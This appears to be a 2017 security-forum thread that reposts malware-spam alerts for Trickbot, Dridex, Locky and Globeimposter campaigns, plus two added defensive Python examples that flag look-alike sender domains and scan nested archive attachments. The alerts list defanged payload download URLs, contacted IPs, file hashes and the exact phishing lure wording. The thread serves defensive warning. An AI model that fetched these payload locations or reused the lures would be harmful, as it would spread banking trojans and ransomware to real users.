** https://www.hybrid-analysis.com/sample/ccb37237584d7b3101a48e38f47a6a5e8c063fa714e27a8da2641e53d943629c?environmentId=100
Contacted Hosts
66.36.173.159
146.120.110.46

*** https://www.virustotal.com/en/file/3b1fae1e523e7d8615d557b0f977b5a02246c7caee2977baa79e2bf3bb9eaa0e/analysis/1504087141/
hJBoTJ.exe
___

Fake 'Secure email message' SPAM - delivers Trickbot
- https://myonlinesecurity.co.uk/more-fake-natwest-emails-deliver-trickbot-banking-trojan/
30 Aug 2017 - "An email with the subject of 'Secure email message' pretending to come from NatWest bank but actually coming from a look-a-like domain noreply@ servicemessage### .ml with a malicious word doc attachment is today’s latest spoof of a well-known company, bank or public authority delivering Trickbot banking Trojan. The ### is any number between 501 and 599 - .ml domains are -free- domains administered by freenom .com... I am seeing domains ranging from servicemessage501 .ml to servicemessage599 .ml all being hosted on -different- IP numbers & ranges all appearing to be -compromised- ISP IP numbers from major ISPs in UK, Europe & USA...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/08/NatWest_servicemessage_ml.png

The word doc looks like:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/08/natwest1753465723087_352_doc.png

natwest1753465723087_352.doc - Current Virus total detections 6/58*. Payload Security**.
This malware file downloads from
http ://campuslinne .com/pages/kasaragarban.png which of course is -not- an image file but a renamed .exe file that gets renamed to Buqtjkk.exe (VirusTotal 12/64***). An alternative download location is
http ://campusassas .com/fonction/kasaragarban.png
This email attachment contains a genuine word doc with a macro script that when run will infect you...
DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/9b54f1e19cd44ead8845394ddc5990387293dac96b7840f7823af9b651f18d51/analysis/
natwest1753465723087_352.doc

** https://www.hybrid-analysis.com/sample/9b54f1e19cd44ead8845394ddc5990387293dac96b7840f7823af9b651f18d51?environmentId=100
Contacted Hosts
193.227.248.241
158.69.26.138
178.156.202.206

*** https://www.virustotal.com/en/file/fbabcb0827d40e53a5cfd5c35c045fff26d0ea369f8ad95d5f2c1d05464102c5/analysis/
kasaragarban.png

campuslinne .com: 193.227.248.241: https://www.virustotal.com/en/ip-address/193.227.248.241/information/
> https://www.virustotal.com/en/url/7284e8db4dc8127ce3e4cd6bef9223a6b98ee065e082cd43751bca507f12740d/analysis/

campusassas .com: 193.227.248.241
> https://www.virustotal.com/en/url/e86bc2bac65ee901ccc2f40b37131eb8771be7938c976d7fe5c99bf8734ee05c/analysis/
___

Fake 'BT OneBill' SPAM - leads to Dridex
- https://myonlinesecurity.co.uk/fake-your-latest-bt-onebill-is-available-now-malspam-leads-to-dridex-banking-trojan/
30 Aug 2017 - "An email with the subject of 'Your latest BT OneBill is available now' pretending to come from BT but actually coming from a different domain ebilling4business@ btdnet .com that can just about be mistaken for a genuine BT email address is today’s latest spoof of a well-known company, bank or public authority delivering Dridex banking Trojan... Today’s example of the spoofed domains are, as usual, registered via eranet .com as registrar. This was registered on 29 August 2017 by the criminals:
btdnet .com hosted on 54.36.30.168 OVH
This particular email was sent from IP 54.36.30.230 but a quick look up of the domain details show that these criminals have also set a-whole-range of IP addresses to be able to send these emails and pass authentication checks...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/08/Your-latest-BT-OneBill-is-available-now.png

The -link-in-the-email goes to a compromised or fraudulently set up SharePoint AKA onedrive for business address:
https ://mccabelawyers-my.sharepoint .com/personal/g_macneill_swslawyers_com_au/_layouts/15/guestaccess.aspx?docid=0cc833a8ff3b4411a986bfb04282f2ffb&authkey=AVpD74OXseK7zr4gaxr_UBE
which downloads the zip file containing the .js file that eventually delivers Dridex.

BT OneBill.zip extracts to: BT OneBill.js - Current Virus total detections 7/58*. Payload Security**.
This downloads Dridex banking Trojan but I am unable to determine the actual download site
(VirusTotal 17/64[3])... The basic rule is NEVER open any attachment -or- link in an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/0cc72a59f6e11f96ee439e2dc330dbd57f0b5103c169c106c45ceb46616bd46c/analysis/1504105031/
BT_OneBill.js

** https://www.hybrid-analysis.com/sample/0cc72a59f6e11f96ee439e2dc330dbd57f0b5103c169c106c45ceb46616bd46c?environmentId=100

3] https://www.virustotal.com/en/file/aa8ab51321fd141bad504fee708649e6fb950ccecc8305acfef34223e4ee587c/analysis/
SdVoAfj.exe
___

Fake 'Sage' SPAM - delivers malware
- https://myonlinesecurity.co.uk/fake-your-sage-subscription-invoice-is-due-delivers-malware/
30 Aug 2017 - "An email with the subject of 'Your Sage subscription invoice is Due' pretending to come from Sage but actually coming from a look-a-like domain SAGE UK <message@ sagemailsupport14 .top> with a malicious word doc attachment is another one of today’s spoofs of a well-known company, bank or public authority... I am being told it is a smokeloader[1] which downloads a variety of -other- malware...
1] https://twitter.com/James_inthe_box/status/902979668239761408
... Today’s example of the spoofed domains are:
sagemailsupport14 .top hosted on 82.202.233.14 AS49505 OOO Network of data-centers Selectel
I have discovered a-whole-range of -fake- sagemailsupport## .top domains on this network. So far I can find sagemailsupport10 .top -to- sagemailsupport110 .top hosted on the corresponding IP address -range- between 82.202.233.10 and 82.202.233.110, all having rDNS set properly and passing email authentication...
[ 82.202.233.* ]

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/08/Your-Sage-subscription-invoice-is-Due.png

INV0293083017.doc - Current Virus total detections 5/58*. Payload Security**. This malware file downloads from
http ://5.149.252.152 /r37.exe (VirusTotal 16/64[3]) (Payload Security[4]). An alternative download location is
http ://200.7.98.51 /r37.exe
This email attachment contains a genuine word doc with a macro script that when run will infect you.
The word doc looks like:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/08/INV0293083017_doc.png
DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/daa46ac8ed9b0208d47951b2739d87f9e03374b6bc23f425b38e8d7176cdfba8/analysis/1504103297/
INV0293083017.doc

** https://www.hybrid-analysis.com/sample/daa46ac8ed9b0208d47951b2739d87f9e03374b6bc23f425b38e8d7176cdfba8?environmentId=100

3] https://www.virustotal.com/en/file/aec5edea7f7b0a038f32ecb7d6be0cc2cf68115445159fa5109a4fa45c5721e2/analysis/1504116823/

4] https://www.hybrid-analysis.com/sample/aec5edea7f7b0a038f32ecb7d6be0cc2cf68115445159fa5109a4fa45c5721e2?environmentId=100
Contacted Hosts
2.20.202.119
217.23.8.41

5.149.252.152: https://www.virustotal.com/en/ip-address/5.149.252.152/information/
> https://www.virustotal.com/en/url/80426fa67fb0de0bec6b685777831351ba12d021542e3ef8fff1dc4e6a8ff56e/analysis/

200.7.98.51: https://www.virustotal.com/en/ip-address/200.7.98.51/information/
> https://www.virustotal.com/en/url/f6eee5b4ed0308257736a5ff8fc2f5b21fc99a00b3f99dba2d3c997517412409/analysis/

:fear::fear: :mad:
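The look-alike sender domains in the reports above (btdnet .com, the sagemailsupport## .top series, and the rest) are registered and hosted by the attackers, so SPF/DKIM pass and authentication results cannot catch them. The following is an added example, not code from the quoted reports or from this forum: a brand-impersonation check on the From: domain that ignores authentication results. The brand allowlist, the local parts and the numbered value 123 are assumptions.

```python
import re
from email.utils import parseaddr

# Brand keywords and the domains assumed legitimate for each brand. This
# allowlist is an assumption for the example, not an authoritative list.
# Short brand names such as "bt" are left out on purpose: matched as a
# prefix they would hit far too many unrelated domains.
BRANDS = {
    "natwest": {"natwest.com"},
    "santander": {"santander.co.uk"},
    "sage": {"sage.com"},
    "virginmedia": {"virginmedia.com"},
}

# Throwaway domains registered as a numbered series, e.g. servicemessage###.ml
# or sagemailsupport##.top: a letters-only stem, digits, then the TLD.
NUMBERED_SERIES = re.compile(r"^([a-z]+?)(\d+)\.([a-z.]+)$")


def sender_domain(from_header: str) -> str:
    """Lower-cased domain of the address in a From: header value."""
    _display, addr = parseaddr(from_header)
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def assess_sender(from_header: str) -> dict:
    """Classify the sender domain of one message.

    SPF/DKIM/DMARC results are deliberately not consulted: the attacker owns
    the look-alike domain, so those checks pass and tell us nothing here.
    """
    domain = sender_domain(from_header)
    result = {"domain": domain, "brand": None, "lookalike": False,
              "series_stem": None}
    # A brand name at the start of any label (split on '.' and '-') counts as
    # a brand reference; the legitimate domain or one of its subdomains is
    # fine, anything else is treated as a look-alike.
    labels = re.split(r"[.-]", domain)
    for brand, legit in BRANDS.items():
        if any(label.startswith(brand) for label in labels):
            result["brand"] = brand
            genuine = any(domain == d or domain.endswith("." + d) for d in legit)
            result["lookalike"] = not genuine
            break
    match = NUMBERED_SERIES.match(domain)
    if match:
        result["series_stem"] = match.group(1)
    return result


def triage(from_headers):
    """Return the headers that deserve a closer look, with their assessments."""
    flagged = []
    for header in from_headers:
        verdict = assess_sender(header)
        if verdict["lookalike"] or verdict["series_stem"]:
            flagged.append((header, verdict))
    return flagged


# Constructed sample From: headers. The domains are the ones named in the
# quoted reports; the local parts and the number 123 are made up.
SAMPLE_FROM_HEADERS = [
    "Natwest <message@natwestbacs.co.uk>",
    "Santander <account.documents@santanderdoc.co.uk>",
    "SAGE UK <message@sagemailsupport14.top>",
    "NatWest <noreply@servicemessage123.ml>",
    "Virgin Media <webteam@virginmediaconnections.com>",
    "Alerts <alerts@mail.natwest.com>",   # constructed legitimate subdomain
]

if __name__ == "__main__":
    for header, verdict in triage(SAMPLE_FROM_HEADERS):
        print(header, "->", verdict)
```

The series check catches servicemessage123 .ml even though no brand keyword appears in it, while the allowlist keeps a genuine subdomain such as mail.natwest.com out of the flagged set.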

AplusWebMaster
2017-08-31, 17:14
FYI...

Fake 'Customer message' SPAM - delivers Trickbot
- https://myonlinesecurity.co.uk/trickbot-banking-trojan-continues-to-be-delivered-by-spoof-natwest-bank-messages/
31 Aug 2017 - "... imitating NatWest Bank and using the same look-a-like domain as yesterday’s version[1]... using a slightly different email message. They have even re-used the same domains to deliver the actual payload, but with different file names.
[1] https://myonlinesecurity.co.uk/more-fake-natwest-emails-deliver-trickbot-banking-trojan/
An email with the subject of 'Customer message' pretending to come from NatWest bank but actually coming from a look-a-like domain noreply@ servicemessage### .ml with a malicious word doc attachment is today’s latest spoof of a well-known company, bank or public authority delivering Trickbot banking Trojan. The ### is any number between 1 and 599...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/08/NatWest_customer-message.png

natwest112543798124_21454.doc - Current Virus total detections 5/58*. Payload Security**.
This malware file downloads from
http ://campuslinne .com/maquette2/nataresonodor.png which of course is -not- an image file but a renamed .exe file that gets renamed to Ubqwyc.exe (VirusTotal 15/65***). An alternative download location is
http ://campusassas .com/imagesv1/nataresonodor.png
This email attachment contains a genuine word doc with a macro script that when run will infect you.
The word doc looks identical to yesterday’s but with a different document name:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/08/natwest1753465723087_352_doc.png
... DO NOT follow the advice they give to enable macros or enable editing to see the content..."
* https://www.virustotal.com/en/file/1608d0823eda26ec0416763b24750e52724aa5fe97373168e60763e61ec97ea8/analysis/1504181231/
natwest112543798124_21454.doc

** https://www.hybrid-analysis.com/sample/1608d0823eda26ec0416763b24750e52724aa5fe97373168e60763e61ec97ea8?environmentId=100

*** https://www.virustotal.com/en/file/21d997031311679fcff57d95ef265fa0e43f0cad40fd4f24e1250d909ebb6ddd/analysis/
Ubqwyc.exe

campuslinne .com: 193.227.248.241: https://www.virustotal.com/en/ip-address/193.227.248.241/information/
> https://www.virustotal.com/en/url/2a075f4997d974b36ee9dc8761042ff69f2d3d96bff4b953e55864cbca67bf64/analysis/

campusassas .com: 193.227.248.241
> https://www.virustotal.com/en/url/398b6d132adbbdf13e8f4082e617d4ce2b6e26ea06f2e1cc3486297e9440dd87/analysis/
___

Fake 'Important Documents' SPAM - delivers Trickbot
- https://myonlinesecurity.co.uk/fake-santander-bank-important-new-account-documents-delivers-trickbot-banking-trojan/
31 Aug 2017 - "An email with the subject of 'Important – New Account Documents' pretending to come from Santander Bank but actually coming from a look-a-like domain Santander <account.documents@ santanderdoc .co.uk> or Santander <account.documents@ santandersec .co.uk> with a malicious word doc attachment is another spoof of a well-known company, bank or public authority delivering Trickbot banking Trojan...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/08/spoofed-santander-Important-New-Account-Documents.png

Account_Documents_31082017.doc - Current Virus total detections 10/58*. Payload Security**.
This malware file downloads from
http ://evaluator-expert .ro/sergio.png which of course is -not- an image file but a renamed .exe file that gets renamed to bicprcv.exe (VirusTotal 17/64***).
An alternative download location is
http ://www.events4u .cz/sergio.png
This email attachment contains a genuine word doc with a macro script that when run will infect you.
The word doc looks like:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/08/fake-santander-Account_Documents_31082017_doc.png
... DO NOT follow the advice they give to enable macros or enable editing to see the content..."
* https://www.virustotal.com/en/file/2419210bdd20b352b357573e72eb82bafa801b078f25517546bd348e2e93a505/analysis/
Account_Documents_31082017.doc

** https://www.hybrid-analysis.com/sample/2419210bdd20b352b357573e72eb82bafa801b078f25517546bd348e2e93a505?environmentId=100

*** https://www.virustotal.com/en/file/5cc61af06afd858f5d3aadfc68f685085f37edc9d13e962000f05720e9465987/analysis/
bicprcv.exe

evaluator-expert .ro: 93.114.64.118: https://www.virustotal.com/en/ip-address/93.114.64.118/information/
> https://www.virustotal.com/en/url/240948bcdd53ead94e0038315e36856eaad20a0b2a29d521b374ce166a1099bb/analysis/

events4u .cz: 93.185.102.11: https://www.virustotal.com/en/ip-address/93.185.102.11/information/
> https://www.virustotal.com/en/url/5b521bc8b70b0e045253d4f314da42ff1003a880d0c52696aaef43b2a7f6d3f8/analysis/

:fear::fear: :mad:

AplusWebMaster
2017-09-01, 13:01
FYI...

Fake 'Dropbox' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/fake-dropbox-please-verify-your-email-address-delivers-locky-ransomware/
31 Aug 2017 10:03 pm - "We are seeing a run of a very different Locky delivery email tonight. This only seems to work properly in Google Chrome, Firefox gives a simple download file box and Internet Explorer gives error messages on clicking the “click here” link. This means that Internet Explorer users will be safe from this attack, but Google Chrome and Firefox users could be infected if they aren’t careful. The email pretends to be from -Dropbox- asking you to 'verify your email address to continue' the sign up...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/08/Fake-Dropbox-Please-verify-your-email-address.png

Win.JSFontlib09.js - Current Virus total detections 22/58*. Payload Security** |
Locky Binary (VirusTotal 17/65***)
There appear to be -hundreds- of different links-in-these-emails that go to -compromised- sites pretending to be Dropbox. They all however have the -same- few links to actually download the .js malware file...
The link in this particular example went to
http ://jakuboweb .com/dropbox.html but each email I received (so far 300+) has a multitude of different links.
Following the link in the email leads to a page looking like this, which is -different- in each commonly used browser. Let's start with Internet Explorer which gives an error on pressing “click here”:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/08/verify_dropbox_IE.png
... Firefox which gives a file download prompt:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/08/verify_dropbox_FF.png
... Google Chrome which displays the lure... telling you that The “HoeflerText” font was not found. The web page you are trying to load is displayed incorrectly, as it uses the “HoeflerText” font. To fix the error and display the text, you have to update the “Chrome Font Pack”:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/08/verify_dropbox_chrome.png
The link from chrome went to
http ://gclubrace .info/json.php whereas the links from the other 2 versions went to
http ://dippydado .net/json.php all of which downloaded the -same- Win.JSFontlib09.js ...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/decd71ae3b5e683f0c3d057ac0576cbd624ca10734e1984f15cb77fcd23c4a37/analysis/
Win.JSFontlib09.js

** https://www.hybrid-analysis.com/sample/decd71ae3b5e683f0c3d057ac0576cbd624ca10734e1984f15cb77fcd23c4a37?environmentId=100
Contacted Hosts
202.169.44.143
46.183.165.45
216.58.209.228
216.58.209.238

*** https://www.virustotal.com/en/file/19865bb16f4609b4703eaba1d773d60a85009b715274ad862ca4cbb5772c621a/analysis/1504207421/
pGDIWEKDHD2.exe

jakuboweb .com: 149.7.99.14: https://www.virustotal.com/en/ip-address/149.7.99.14/information/
> https://www.virustotal.com/en/url/f47b40dda4fa6bc2aa7ce0efa2fd25530a38ab7af897d0ff9940ff7da44ebb0a/analysis/

gclubrace .info: Could not find an IP address for this domain name...

dippydado .net: Could not find an IP address for this domain name...
___

RIG exploit kit > 'Princess' ransomware
- https://blog.malwarebytes.com/cybercrime/2017/08/rig-exploit-kit-distributes-princess-ransomware/
Aug 31, 2017 - "We have identified a new drive-by-download campaign that distributes the Princess-ransomware (AKA PrincessLocker), leveraging -compromised-websites-and the RIG-exploit-kit. This is somewhat of a change for those tracking malvertising campaigns and their payloads... We are not so accustomed to witnessing compromised websites pushing exploit kits... some campaigns have been replaced with tech support scams instead and overall most drive-by activity comes from -legitimate- publishers and -malvertising- ... we observed an -iframe-injection- which redirected from the -hacked- site to a temporary gate...
Indicators of compromise:
RIG EK gate: 185.198.164.152
RIG EK IP address: 188.225.84.28 ..."
(More detail at the malwarebytes URL above.)

:fear::fear: :mad:

AplusWebMaster
2017-09-04, 15:10
FYI...

Fake 'Invoice' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/fake-invoice-inv-000379-from-property-lagoon-limited-for-gleneagles-equestrian-centre-delivers-locky-ransomware/
4 Sep 2017 - "... Locky downloader... an email with the subject of 'Invoice INV-000379' from Property Lagoon Limited for Gleneagles Equestrian Centre (random numbers) pretending to come from a random name that matches the name in the email body but appearing to come from messaging-service@ post.xero .com...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/Invoice-INV-000379-from-Property-Lagoon-Limited-for-Gleneagles-Equestrian-Centre.png

Invoice INV-000379.7z: Extracts to: INV-000626.vbs - Current Virus total detections 13/59*. Payload Security**
Locky download (VirusTotal ***). These all have a 7z attachment and a link-in-email-body to download the zip. The invoice amounts are random as well.... The basic rule is NEVER open any attachment or link in an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/e3def32921636d8037a62e4448c4e6f6e3fe7ad0ac3e76ffe4f691201059883b/analysis/1504521374/
INV-000626.vbs

** https://www.hybrid-analysis.com/sample/e3def32921636d8037a62e4448c4e6f6e3fe7ad0ac3e76ffe4f691201059883b?environmentId=100
DNS Requests
clubdeautores .es: 91.121.165.214

*** https://www.virustotal.com/en/file/3ac9ab7ddd73531c3d5b7438f6bb74a7711c7f523770d61c338da4664993e7b1/analysis/1504516547/
BSmIimqLX.exe
___

Fake 'Invoice' SPAM - delivers Globeimposter ransomware
- https://myonlinesecurity.co.uk/fake-true-telecom-invoice-for-august-2017-delivers-globeimposter-ransomware/
4 Sep 2017 - "... an email with the subject of '45653946 – True Telecom Invoice for August 2017' (random numbers) pretending to come from billing@ true-telecom .com. This is coming via the Necurs botnet but instead of delivering Locky today, this 2nd malspam run is delivering Globeimposter ransomware... As with today’s earlier malspam run that delivered Locky ransomware[1], these have a-link-in-the-body to download the zip and a zip (7z) attachment as well...
1] https://myonlinesecurity.co.uk/fake-invoice-inv-000379-from-property-lagoon-limited-for-gleneagles-equestrian-centre-delivers-locky-ransomware/

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/45653946-True-Telecom-Invoice-for-August-2017.png

2017-08-45653946-Bill.7z: 2017-08-41840179-Bill.vbs - Current Virus total detections 8/57*. Payload Security**
Another version (VirusTotal 10/58***) | (Payload Security[4]) | downloaded & xor’d binary - VirusTotal 18/64[5] | Payload Security[6]...
The basic rule is NEVER open any attachment or link in an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/d2c273e9f2de35f40d6d727dde3bdbca9fecec75608d7f411604efd0b89ca24b/analysis/1504533698/
2017-08-41840179-Bill.vbs

** https://www.hybrid-analysis.com/sample/d2c273e9f2de35f40d6d727dde3bdbca9fecec75608d7f411604efd0b89ca24b?environmentId=100
DNS Requests
world-tour2000 .com: 103.53.172.3
naturofind .org: 85.192.177.103
www .world-tour2000 .com: 103.53.172.3
proyectogambia .com: 87.106.65.247

*** https://www.virustotal.com/en/file/b4259b3a6955398c5a3bc932f07f0601c4f99911d1426a473bc7a134e7764b3b/analysis/
2017-08-92918095-Bill.vbs

4] https://www.hybrid-analysis.com/sample/b4259b3a6955398c5a3bc932f07f0601c4f99911d1426a473bc7a134e7764b3b?environmentId=100
Contacted Hosts
49.50.240.107

5] https://www.virustotal.com/en/file/bb1df4a93fc27c54c78f84323e0ea7bb2b54469893150e3ea991826c81b56f47/analysis/
zojzoefi.exe

6] https://www.hybrid-analysis.com/sample/bb1df4a93fc27c54c78f84323e0ea7bb2b54469893150e3ea991826c81b56f47?environmentId=100
___

Fake 'Incoming Docs' SPAM - delivers Trickbot
- https://myonlinesecurity.co.uk/more-fake-natwest-bank-messages-with-a-password-protected-word-doc-delivers-trickbot/
4 Sep 2017 - "An email with the subject of 'Important: Incoming BACs Documents' pretending to come from NatWest Bank but actually coming from a look-a-like domain Natwest <message@ natwestbacs .co.uk> or Natwest <message@ natwestbacs .com> with a password protected malicious word doc attachment is today’s latest spoof of a well-known company, bank or public authority delivering Trickbot banking Trojan...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/Important-Incoming-BACs-Documents-spoofed-NatWest.png

SecureMessage.doc - Current Virus total detections 5/55*. Payload Security** | JoeSandBox***
This malware file downloads from
http ://6-express .ch/ser.png which of course is -not- an image file but a renamed .exe file that gets renamed to execute.exe (VirusTotal [4]). An alternative download location is
http ://checkpointsystems .de/ser.png
This email attachment contains a genuine word doc with a macro script that when run will infect you.
The word doc looks like:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/natWest_bacs_docs.png
DO NOT follow the advice they give to enable macros or enable editing to see the content..."
* https://www.virustotal.com/en/file/406047bbbad09cafeb623eb2c1057441ae6db7f19f630acf9a02f9c48e7f40a7/analysis/1493724795/
SecureMessage.doc

** https://www.hybrid-analysis.com/sample/406047bbbad09cafeb623eb2c1057441ae6db7f19f630acf9a02f9c48e7f40a7?environmentId=100
Contacted Hosts
216.138.226.110
50.19.97.123
186.208.111.188
82.146.94.86

*** https://jbxcloud.joesecurity.org/analysis/355644/1/html

4] https://www.virustotal.com/en/file/e2ee8c46af39bc11f1680ceada5147f49144bb636db6941fdac35f2ca69c7ff4/analysis/1504524050/
ser.png

6-express .ch: 77.236.96.52: https://www.virustotal.com/en/ip-address/77.236.96.52/information/
> https://www.virustotal.com/en/url/7e68a8bf15fb12864a705989a7daf8de01b83f81956521d6e1a4fc905665429f/analysis/

checkpointsystems .de: 87.106.183.214: https://www.virustotal.com/en/ip-address/87.106.183.214/information/
___

Locky ransomware campaign
- https://www.helpnetsecurity.com/2017/09/01/locky-returns-new-tricks/
Sep 1, 2017 - "... the newest variant adds the .lukitus extension to the encrypted files:
> https://www.helpnetsecurity.com/images/posts/email-locky-appriver.jpg
... AppRiver researchers explained*. The malware arrives in inboxes attached to emails with vague subject lines like “please print”, “documents”, “scans”, “images”, and so on. And, unfortunately for those who get infected, there are no publicly shared methods to reverse this Locky strain. The crooks behind this malware campaign are asking 0.5 Bitcoin to deliver the decryption key..."

* https://blog.appriver.com/2017/08/locky-ransomware-attacks-increase/
Aug 30, 2017 - "... In the past 24 hours we have seen over 23-million-messages sent in this attack, making it one of the largest malware campaigns that we have seen in the latter half of 2017... a massive malicious email campaign began attempting to reach their inboxes. A large spike in malware traffic began this morning just after 7 am CST... The emails utilized one of the following subject lines:
please print
documents
photo
images
scans
pictures
Each message comes with a ZIP attachment that contains a Visual Basic Script (VBS) file that is nested inside a secondary ZIP file..."
> https://blog.appriver.com/2017/05/you-can-defeat-ransomware/

:fear::fear: :mad:
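The attachments in this post are archives with a script inside: a .vbs in a 7z in the MyOnlineSecurity reports, and, per the AppRiver write-up, a VBS inside a ZIP nested in a second ZIP. As an added example, not from the quoted sources, here is a mail-gateway style check that descends into nested archives and refuses script members, double extensions and excessive nesting. It uses ZIP throughout because 7z needs a third-party library; the sample archives are constructed in memory with inert placeholder contents.

```python
import io
import zipfile

# Member extensions that should never arrive inside an e-mail attachment.
SCRIPT_EXTS = {".vbs", ".js", ".jse", ".wsf", ".hta", ".exe", ".scr"}
# Extensions a second extension may be hiding behind (e.g. "scan.pdf.exe").
DOC_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".jpg", ".png"}
MAX_DEPTH = 3                       # archives nested deeper than this are refused
MAX_TOTAL_BYTES = 50 * 1024 * 1024  # declared uncompressed size budget per attachment


def _extension_parts(member_name: str):
    """('report', ['pdf']) for 'dir/report.pdf'; lower-cased, directories dropped."""
    base = member_name.rsplit("/", 1)[-1].lower()
    parts = base.split(".")
    return parts[0], parts[1:]


def scan_archive(data: bytes, name: str, depth: int = 0, budget=None) -> list:
    """List (member_path, reason) findings for a ZIP, descending into nested ZIPs."""
    if budget is None:
        budget = [MAX_TOTAL_BYTES]      # one-element list so nested calls share it
    if depth > MAX_DEPTH:
        return [(name, f"archive nested deeper than {MAX_DEPTH} levels")]
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return []                       # not a ZIP: nothing further to descend into
    findings = []
    with zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            path = f"{name}/{info.filename}"
            _stem, exts = _extension_parts(info.filename)
            last = "." + exts[-1] if exts else ""
            if last in SCRIPT_EXTS:
                findings.append((path, f"script or executable member ({last})"))
            if len(exts) >= 2 and "." + exts[-2] in DOC_EXTS:
                findings.append((path, "double extension hides the real type"))
            budget[0] -= info.file_size
            if budget[0] < 0:
                findings.append((path, "declared uncompressed size exceeds budget"))
                return findings
            member = zf.read(info)
            # Descend on content, not on extension: a renamed ZIP is still a ZIP.
            if member[:4] == b"PK\x03\x04":
                findings.extend(scan_archive(member, path, depth + 1, budget))
    return findings


def verdict(data: bytes, name: str):
    """('block' | 'allow', findings) for one attachment."""
    findings = scan_archive(data, name)
    return ("block" if findings else "allow"), findings


def build_zip(members: dict) -> bytes:
    """Build an in-memory ZIP from {member_name: bytes} (for the constructed samples)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for member_name, content in members.items():
            zf.writestr(member_name, content)
    return buf.getvalue()


# Constructed stand-ins for the attachments described above: a .vbs nested inside
# a secondary archive, a double-extension member, and a benign document. The
# member contents are inert placeholders, not the real downloader scripts.
INNER = build_zip({"INV-000626.vbs": b"' placeholder text, not a script payload\r\n"})
NESTED_ATTACHMENT = build_zip({"Invoice INV-000379.zip": INNER})
DOUBLE_EXT_ATTACHMENT = build_zip({"Scan_Document.pdf.exe": b"MZ placeholder"})
BENIGN_ATTACHMENT = build_zip({"report.pdf": b"%PDF-1.4 placeholder"})

if __name__ == "__main__":
    for label, blob in [("nested", NESTED_ATTACHMENT),
                        ("double", DOUBLE_EXT_ATTACHMENT),
                        ("benign", BENIGN_ATTACHMENT)]:
        print(label, verdict(blob, "attachment.zip"))
```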

AplusWebMaster
2017-09-05, 13:33
FYI...

Fake 'Scanning' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/locky-delivered-by-fake-scanning-message-pretending-to-come-from-random-names-tayloredgroup-co-uk/
5 Sep 2017 - "... Locky downloader... an email with the subject of 'Scanning' pretending to come from random names @ tayloredgroup .co.uk... These have a -link-in-the-body- of the email to download the malware as well as an email attachment. The link does -NOT- go to Dropbox but another compromised website, however the link is not correctly formed in this example so won’t open and gives warning in Outlook:
http ://dna-sequencing .org/MSG000-00090.7z

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/scanning_-taylored_group.png

SCNMSG00002704.7z: Extracts to: Invoice INV-000518.vbs - Current Virus total detections 13/59*.
Payload Security**... The basic rule is NEVER open any attachment or link in an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/9b36bd48e7546c52f000bc0a44a4588e0455fd17f6eeae13543b146f57e25dac/analysis/1504602932/

** https://www.hybrid-analysis.com/sample/9b36bd48e7546c52f000bc0a44a4588e0455fd17f6eeae13543b146f57e25dac?environmentId=100
DNS Requests
pamplonarecados .com: 5.2.88.79: https://www.virustotal.com/en/ip-address/5.2.88.79/information/

dna-sequencing .org: 66.36.160.119: https://www.virustotal.com/en/ip-address/66.36.160.119/information/
> https://www.virustotal.com/en/url/da729379cd20a2bb56556cc96da954550f7e707ab9e68aa8556d87599c0e53fd/analysis/
MSG000-00090.7z

tayloredgroup .co.uk: 85.233.160.151: https://www.virustotal.com/en/ip-address/85.233.160.151/information/
> https://www.virustotal.com/en/url/dfdf910f22ccb73e5ca97f639cef8e08cbca81fc99d1a8e6f5acecbfd31a074b/analysis/
__

> http://blog.dynamoo.com/2017/09/malware-spam-scanning-pretending-to-be.html
5 Sep 2017 - "This -spam- email pretends to be from tayloredgroup .co.uk but it is just a simple -forgery- leading to Locky ransomware. There is -both- a malicious attachment and -link- in the body text. The name of the sender varies.
Subject: Scanning
From: "Jeanette Randels" [Jeanette.Randels@tayloredgroup.co.uk]
Date: Thu, May 18, 2017 8:26 pm
https ://dropbox .com/file/9A30AA
Jeanette Randels DipFA
Taylored Group
26 City Business Centre
Hyde Street
Winchester
SO23 7TA
Members of the CAERUS Capital Group
www .tayloredgroup .co.uk
Office Number: 01962 826870
Mobile: 07915 612277
email: Jeanette.Randels@ tayloredgroup .co.uk
Taylored Financial Planning is a trading style of Jonathan & Carole
Taylor who are an appointed representative of Caerus Financial Limited...

Despite having what appears to be a Dropbox URL, the link actually goes to another site completely and downloads a .7z archive file containing a malicious VBS script. Attached is another .7z archive file with a slightly different evil VBS script inside.
Detection rates for the scripts are about 13/58 [1] [2]. Automated analysis [3] [4] [5] [6] shows -Locky- ransomware attempting to phone home to the following locations:
